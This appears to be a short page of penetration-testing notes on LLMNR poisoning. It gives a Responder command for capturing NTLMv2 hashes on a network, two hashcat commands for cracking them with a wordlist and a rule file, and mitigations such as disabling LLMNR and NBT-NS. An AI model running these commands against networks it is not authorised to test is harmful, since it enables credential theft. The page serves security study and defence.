LLMNR Poisoning

Overview

Link Local Multicast Name Resolution (LLMNR), is used to identify hosts when DNS fails to do so in the network.

The main flaw with LLMNR is that the services use a user's username and NTLMv2 hash when responded to

Captured hash example from Kali Forums

Responder

sudo responder -I eth0 -dwv

Crack NTLM Hashes

hashcat -m 5600 crackme.txt ~/rockyou.txt -O
hashcat -m 5600 crackme.txt ~/rockyou.txt -r OneRule.rule

Mitigation

  • Best defense is to disable LLMNR and NBT-NS

  • Strong password policy (14 char)

PreviousInitial Attack StrategyNextSMB Relay